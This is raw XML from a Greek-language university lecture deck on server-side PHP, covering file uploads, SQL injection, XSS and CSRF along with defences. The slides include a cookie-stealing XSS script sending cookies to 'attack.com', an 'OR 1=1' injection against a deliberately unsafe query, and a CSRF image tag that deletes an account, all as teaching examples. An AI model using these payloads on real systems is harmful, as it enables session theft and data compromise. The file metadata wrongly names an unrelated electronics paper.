            <a:off x="909174" y="2049430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Υπάρχουν δύο ειδών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paths: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Relative paths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"images/photo.jpg”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"../data/users.txt"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Absolute paths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"/var/www/html/project/data.txt«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"C:\\xampp\\htdocs\\app\\data.txt"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Relative paths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”  Εξαρτώνται από: (α)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script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που τα καλεί (β)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working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directory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(γ)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include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path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Absolute paths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Πλεονεκτήματα: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Σταθερά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αλλάζουν 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include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ασφαλέστερα για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delete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writ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2419728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FAD70-9B17-F2FC-204A-892A028D4F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62193-B2E7-A364-3079-EBDC99EBA7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92183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File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Uploads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BF57E336-DC01-E455-DA37-1A5D002C124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74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D82AB80-68FC-1363-2A4C-AF885A566117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2046746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Βασικά βήματα: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φόρμα με:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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form method="POST"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enctype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="multipart/form-data"&gt;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SzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2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παίρνει το αρχείο μέσα από:  $_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FILES['file’]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SzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3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server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αποθηκεύει προσωρινά το αρχείο στο   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tmp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(temp directory)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457200" indent="-457200" algn="just">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4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Πρέπει να το μετακινήσουμε στη θέση που θέλουμε με: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move_uploaded_file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(...)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38436527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78587-1DF2-4BB1-2EB0-28008EC9B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129FB-0A16-121F-89F0-8BAFCBDE1AC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92183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PHP File </a:t>
            </a:r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Uploads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147BFEF5-5D83-97D6-B2CD-EF8239EC217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75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7F06B24-7218-9B01-D8A0-BCACA11BD233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2253575"/>
            <a:ext cx="10580915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Κάθε αρχείο περιέχει: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$_FILES['file']['name']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$_FILES['file']['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tmp_name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']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$_FILES['file']['size']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$_FILES['file']['type']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$_FILES['file']['error']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δεν ελεγχθούν σωστά → μεγάλο ρίσκο ασφαλείας</a:t>
            </a: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07438491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942A6-C003-7E4A-AFF4-D3C8F7EA67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BC195-BBC4-EE67-88D4-0439C2DF0D4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92183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fr-F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move_uploaded_file</a:t>
            </a:r>
            <a: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():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8E7D219-FAA3-4ECE-FC11-3553B60D6A1D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76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5F0719-A55D-315A-1E8F-06FBDF95BEA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="1771759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$target = "uploads/" .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basename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($_FILES['file']['name']);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if (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move_uploaded_file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($_FILES['file']['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tmp_name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'], $target))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echo "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αρχείο ανέβηκε με επιτυχία.";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else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echo "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Σφάλμα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upload.";}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Καμία εμπιστοσύνη σε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filename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χρήστη  Δημιουργία με άλλο όνομα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random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αποθηκεύουμε απευθείας .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.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.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αρχεία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Δεν αποθηκεύουμε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uploads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μέσα στο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web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root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(εκτελέσιμα αρχεία!)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Πρέπει να ελέγξουμε το MIME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type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Πρέπει να ελέγξουμε το μέγεθος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size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limit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Πρέπει να ελέγξουμε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extension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whitelist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7296355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A72891-EA89-2C86-143D-71EF59AF2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4333D-12D1-34FE-6640-9D771D66C70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92183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Ασφάλεια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SQL Injection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6BEA800E-6F00-9D3C-9FC3-1BA43C0FB233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77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0B60E4B-69E4-A425-8CBE-6C2F38EDF526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2164407"/>
            <a:ext cx="10580915" cy="540147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– Φόρμα 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GET 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user.php?id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=1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PHP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$id = $_GET['id'];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$query = "SELECT * FROM users WHERE id=$id“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;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Επιτιθέμενος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?id=1 OR 1=1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SQL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SELECT * FROM users WHERE id=1 OR 1=1;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4203162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3800E3-39D4-8322-A9B7-DC6CFE386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764E1-4C9F-5FBC-A15A-F33F533A9D0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92183"/>
            <a:ext cx="10168128" cy="1179576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"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Ασφάλεια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XSS (Cross-Site Scripting): JavaScript injection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C6D440F5-3120-4080-E99C-5BE9986DFCF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EC4949F-0235-D5F9-9FBF-4927BC436982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2164407"/>
            <a:ext cx="10580915" cy="504753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XSS = ο επιτιθέμενος ενσωματώνει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JavaScript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στον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άλλων χρηστών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Παράδειγμα εισόδου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&lt;script&gt;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document.location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='http://attack.com/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steal?c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='+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document.cookie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&lt;/script&gt;</a:t>
            </a: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η εφαρμογή εμφανίσει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input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χωρίς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escape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→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script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εκτελείται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Επιπτώσεις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XSS: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Κλοπή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cookies, ID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Αυτόματες φόρμες /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clicks (clickjacking)</a:t>
            </a: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Παραποίηση σελίδων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1138845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6D407-2DF1-2E80-7A70-B516053293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F6EEE-DF4F-A181-2E9F-FB003091425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92183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Ασφάλεια - Προστασία από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XSS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967657EA-E239-1FCB-E36C-B219828CF669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79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CC6EE92-7035-C6F5-EEEB-794C2798487C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2164407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htmlspecialchars()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echo htmlspecialchars($username, ENT_QUOTES, 'UTF-8');</a:t>
            </a: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Κάνει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escape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&gt;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’”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&amp;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Έτσι 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script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γίνεται απλό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text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και δεν εκτελείται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3382353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7C6584-68CA-98EA-806B-E069FF3859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DBF86B-12B4-3C98-03EC-3A140A862C4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Διαφορά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/ Post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39B6C1E8-675F-445F-4909-4537BD39FE45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69B6A81-2BE0-6AF1-AA31-3DB9F5D307B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575904" y="1587539"/>
            <a:ext cx="10580915" cy="575542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Μεταφορά δεδομένων φόρμας από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client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στον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web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Post: Αποστολή δεδομένων φόρμας αόρατα από 	 χρήστη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στοιχεία φόρμας μεταφέρονται ως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τµήµα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URL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$_GET[ ]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Συλλέγει τις τιμές από τη φόρμα ως κείμενο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πληροφορία από τη φόρμα ορατή σε όλους (στο πεδίο διευθύνσεων)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 περιορίζει την ποσότητα πληροφορίας που μπορεί να σταλεί</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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$_POST[ ]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Χρησιμοποιείται για συλλογή τιμών που έχουν σταλεί από φόρμα με POST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πληροφορία που στέλνεται από τη φόρμα είναι αόρατη στον πελάτη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μέθοδος POST δεν έχει περιορισμούς ως προς το μέγεθος πληροφορίας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002336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B2EC9F-9BAB-25C9-BEE4-6BF1FD20D8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2AA64-F4CE-F992-1C23-E33F9806691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92183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Ασφάλεια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CSRF (Cross-Site Request Forgery)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E351DB80-4B13-037A-E456-3352536EF188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80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EEC01D-62C0-FF98-49A5-4970565C953B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2164407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CSRF = επίθεση που αναγκάζει χρήστη να εκτελέσει ενέργεια χωρίς να το θέλει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χρήστης είναι συνδεδεμένος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random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site.com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επιτιθέμενος του στέλνει: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img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="https://randomsite.com/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delete_account.php?id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=10"&gt;</a:t>
            </a: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αυτόματα θα κάνει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request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το URL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θα στείλει τα cookies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request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θα είναι “σαν να το έκανε ο χρήστης”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184302398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A5A8A-922E-9187-5235-51BFC0D768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4D18CB-5B73-AD30-7210-66E4D1391BB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92183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Ασφάλεια -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CSRF (Cross-Site Request Forgery)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2A4B1D8A-3F03-8F92-0377-5FE8C9761EFC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81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E5659B-7FF3-28EA-BA36-35063AEBE361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2164407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CSRF = επίθεση που αναγκάζει χρήστη να εκτελέσει ενέργεια χωρίς να το θέλει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χρήστης είναι συνδεδεμένος στο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random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site.com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επιτιθέμενος του στέλνει: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&lt;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img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src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="https://randomsite.com/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delete_account.php?id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=10"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buSzPct val="100000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browser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αυτόματα θα κάνει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request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το URL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θα στείλει τα cookies</a:t>
            </a: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714500" lvl="3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το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request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θα είναι “σαν να το έκανε ο χρήστης”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194515247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B6993-245C-9DD3-F8B8-B7C6BF7C0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F6CD4-EEA6-6FC5-738B-B45BA04F836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92183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Ασφάλεια - στο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file upload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85214979-F9AF-003D-B9AA-341A261D1A9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82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640239-52F8-98A1-5F2C-E02050AA8E47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2164407"/>
            <a:ext cx="10580915" cy="3277820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Ανέβασμα αρχείων είναι μία από τις πιο επικίνδυνες λειτουργίες στην PHP, γιατί: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Ο χρήστης μπορεί να ανεβάσει οποιοδήποτε αρχείο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Ακόμα και αν ζητάμε εικόνα, μπορεί να στείλει PHP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script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 το αποθηκεύσουμε σε φάκελο που εκτελεί PHP → πλήρη παραβίαση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Μπορεί να χρησιμοποιηθεί για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malware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defacement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web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shells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68610972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D865B-222B-DE1B-635B-0493573861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BFD15-41C4-9007-D271-A0E1AF5B91A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15568" y="592183"/>
            <a:ext cx="10168128" cy="1179576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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Έλεγχος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MIME Type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AA50DF1A-C051-B8A4-8318-E41F4946A284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83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D39AA15-3A22-45BF-7CDA-EDF642A75C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2164407"/>
            <a:ext cx="10580915" cy="363176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Μία από τις βασικές άμυνες είναι ο έλεγχος τύπων</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2"/>
              <a:buChar char="§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finfo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finfo_open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(FILEINFO_MIME_TYPE);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$type = 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finfo_file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finfo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, $_FILES['file']['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tmp_name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']);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$allowed = ['image/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jpeg','image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/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png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','image/gif'];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if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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in_array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($type, $allowed)) {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die("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Ανασφαλές αρχείο.");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="just">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"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632903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78CBA-521A-C9BF-B48B-5CEEE8834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5AF37-DE27-8ACE-3481-9141C637F9D7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Μέθοδοι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/ Post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2CCD987-396B-F816-29FA-A813DBD87F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8540496" y="6356351"/>
            <a:ext cx="2743200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68CCBB18-DDCC-4A70-9657-6E759C268159}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="4A66AC"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0">
              <a:solidFill>
                <a:srgbClr val="4A66AC"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Avenir Next LT Pro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B8DD8E-B623-0D6F-FE83-DCA38102214A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702781" y="2059811"/>
            <a:ext cx="10580915" cy="4693593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Φόρμες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μέσο συλλογής πληροφοριών από χρήστη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Απαίτηση συμπλήρωσης (α) μεθόδου –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method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αποστολή δεδομένων και δράσης (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action)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ενεργειών που θα γίνουν σε αυτά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Πληροφορίες κωδικοποιούνται με κανόνες σχήματος </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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URL  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μεταβλητές &amp; τιμές συνδέονται με = κάνοντας ζεύγη  διαχωρισμός διαφορετικών ζευγών με &amp;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Διαστήματα αντικαθίστανται από +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Μη αλφαριθμητικά δεδομένα αντικαθίστανται από </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="23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δεκαεξαδική</a:t>
            </a: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τιμή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l-GR" sz="23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Διαφορετικά ήδη πληροφορίας διαχωρίζονται με ?</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="23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078211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33117</TotalTime>
  <Words>6283</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1230</Paragraphs>
  <Slides>83</Slides>
  <Notes>83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83</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="89" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Avenir Next LT Pro</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>AccentBoxVTI</vt:lpstr>
      <vt:lpstr>Μάθημα 10ο: Προγραμματισμός στην πλευρά του εξυπηρετητή</vt:lpstr>
      <vt:lpstr>PHP  και δυναμικές σελίδες</vt:lpstr>
      <vt:lpstr>PHP  και δυναμικές σελίδες</vt:lpstr>
      <vt:lpstr>PHP &amp; αρχιτεκτονική Client–Server</vt:lpstr>
      <vt:lpstr>Υπερ-καθολικές μεταβλητές</vt:lpstr>
      <vt:lpstr>Υπερ-καθολικές μεταβλητές</vt:lpstr>
      <vt:lpstr>Πίνακας $_SERVER</vt:lpstr>
      <vt:lpstr>Διαφορά Get / Post</vt:lpstr>
      <vt:lpstr>Μέθοδοι Get / Post</vt:lpstr>
      <vt:lpstr>Δημιουργία HTML φόρμας και υποβολή σε PHP</vt:lpstr>
      <vt:lpstr>Επεξεργασία δεδομένων GET</vt:lpstr>
      <vt:lpstr>Επεξεργασία δεδομένων GET</vt:lpstr>
      <vt:lpstr>Επεξεργασία δεδομένων POST</vt:lpstr>
      <vt:lpstr>Έλεγχος εγκυρότητας εισόδου (validation)</vt:lpstr>
      <vt:lpstr>Καθαρισμός εισόδου χρήστη (Sanitization)</vt:lpstr>
      <vt:lpstr>Καθαρισμός εισόδου χρήστη (Sanitization)</vt:lpstr>
      <vt:lpstr>Σύνδεση PHP με βάση δεδομένων MySQL</vt:lpstr>
      <vt:lpstr>Εκτέλεση ερωτημάτων στη βάση δεδομένων (Queries)</vt:lpstr>
      <vt:lpstr>Ανάκτηση δεδομένων από βάση σε εφαρμογή PHP</vt:lpstr>
      <vt:lpstr>Ανάκτηση δεδομένων από βάση σε εφαρμογή PHP</vt:lpstr>
      <vt:lpstr>Το αντικείμενο αποτελεσμάτων (Result Object)</vt:lpstr>
      <vt:lpstr>μέθοδος fetch_assoc()</vt:lpstr>
      <vt:lpstr>μέθοδος fetch_assoc()</vt:lpstr>
      <vt:lpstr>Βρόχος ανάγνωσης όλων των γραμμών</vt:lpstr>
      <vt:lpstr>Παρουσίαση αποτελεσμάτων σε HTML</vt:lpstr>
      <vt:lpstr>Αποδέσμευση αντικειμένου αποτελέσματος</vt:lpstr>
      <vt:lpstr>Κλείσιμο σύνδεσης με τη βάση</vt:lpstr>
      <vt:lpstr>Εισαγωγή δεδομένων (INSERT)</vt:lpstr>
      <vt:lpstr>Έλεγχος αποτυχίας εισαγωγής &amp; διαχείριση σφαλμάτων</vt:lpstr>
      <vt:lpstr>Έννοια CRUD  πυρήνας δυναμικών εφαρμογών</vt:lpstr>
      <vt:lpstr>Η λογική της εισαγωγής (CREATE)</vt:lpstr>
      <vt:lpstr>Μετατροπή τιμών φόρμας σε ασφαλή SQL δεδομένα με PHP</vt:lpstr>
      <vt:lpstr>Μετατροπή τιμών φόρμας σε ασφαλή SQL δεδομένα με PHP</vt:lpstr>
      <vt:lpstr>Μετατροπή τιμών φόρμας σε ασφαλή SQL δεδομένα με PHP</vt:lpstr>
      <vt:lpstr>Εκτέλεση INSERT</vt:lpstr>
      <vt:lpstr>Εκτέλεση INSERT</vt:lpstr>
      <vt:lpstr>λειτουργία UPDATE</vt:lpstr>
      <vt:lpstr>λειτουργία UPDATE – Delete </vt:lpstr>
      <vt:lpstr>λειτουργία Delete </vt:lpstr>
      <vt:lpstr>SQL Injection </vt:lpstr>
      <vt:lpstr>SQL Injection </vt:lpstr>
      <vt:lpstr>Escaping ειδικών χαρακτήρων πριν την εισαγωγή (real_escape_string)</vt:lpstr>
      <vt:lpstr>Prepared Statements</vt:lpstr>
      <vt:lpstr>Prepared Statements με SELECT</vt:lpstr>
      <vt:lpstr>Regular expression (regex)</vt:lpstr>
      <vt:lpstr>Βασικές έννοιες των regex</vt:lpstr>
      <vt:lpstr>Παράδειγμα regex</vt:lpstr>
      <vt:lpstr>Regex για URL</vt:lpstr>
      <vt:lpstr>Regex για τηλέφωνο</vt:lpstr>
      <vt:lpstr>HTML5 validation</vt:lpstr>
      <vt:lpstr>HTML regex μέσα στο input tag</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookies στο HTTP επίπεδο</vt:lpstr>
      <vt:lpstr>Δημιουργία cookie με PHP</vt:lpstr>
      <vt:lpstr>Ανάγνωση cookie με PHP</vt:lpstr>
      <vt:lpstr>Ανάγνωση cookie με PHP</vt:lpstr>
      <vt:lpstr>Διαγραφή cookie με PHP</vt:lpstr>
      <vt:lpstr>Παράμετροι cookie με PHP</vt:lpstr>
      <vt:lpstr>Cookie vs Session</vt:lpstr>
      <vt:lpstr>PHP session</vt:lpstr>
      <vt:lpstr> Session</vt:lpstr>
      <vt:lpstr>Καταστροφή Session</vt:lpstr>
      <vt:lpstr>PHP file handling</vt:lpstr>
      <vt:lpstr>PHP file handling - fopen():</vt:lpstr>
      <vt:lpstr>PHP file handling - fopen():</vt:lpstr>
      <vt:lpstr>PHP file handling - fread ():</vt:lpstr>
      <vt:lpstr>PHP file handling - fwrite ():</vt:lpstr>
      <vt:lpstr>Διαγραφή αρχείου (unlink)</vt:lpstr>
      <vt:lpstr>File existence check</vt:lpstr>
      <vt:lpstr>File paths: absolute vs relative</vt:lpstr>
      <vt:lpstr>PHP File Uploads</vt:lpstr>
      <vt:lpstr>PHP File Uploads</vt:lpstr>
      <vt:lpstr>move_uploaded_file():</vt:lpstr>
      <vt:lpstr>Ασφάλεια - SQL Injection</vt:lpstr>
      <vt:lpstr>Ασφάλεια - XSS (Cross-Site Scripting): JavaScript injection</vt:lpstr>
      <vt:lpstr>Ασφάλεια - Προστασία από XSS</vt:lpstr>
      <vt:lpstr>Ασφάλεια - CSRF (Cross-Site Request Forgery)</vt:lpstr>
      <vt:lpstr>Ασφάλεια - CSRF (Cross-Site Request Forgery)</vt:lpstr>
      <vt:lpstr>Ασφάλεια - στο file upload</vt:lpstr>
      <vt:lpstr>Έλεγχος MIME Type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Compact Ground Bounce Sensors for SoC Energy Harvesting Applications  K. Moustakas*, T. Noulis**, S. Siskos**   *   Paul Scherrer Institute, PSI CH, Forschungsstrasse 111, 5232 Villigen, Switzerland konstantinos.moustakas@psi.ch ** Electronics Lab., Physics Dept., Aristotle University of Thessaloniki, 54124, Greece, tnoul@physics.auth.gr siskos@physics.auth.gr</dc:title>
  <dc:creator>Thomas Noulis</dc:creator>
  <cp:lastModifiedBy>Vasileios-Panagiotis Rekkas</cp:lastModifiedBy>
  <cp:revision>592</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-30T06:21:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-03T18:09:22Z</dcterms:modified>
</cp:coreProperties>
</file>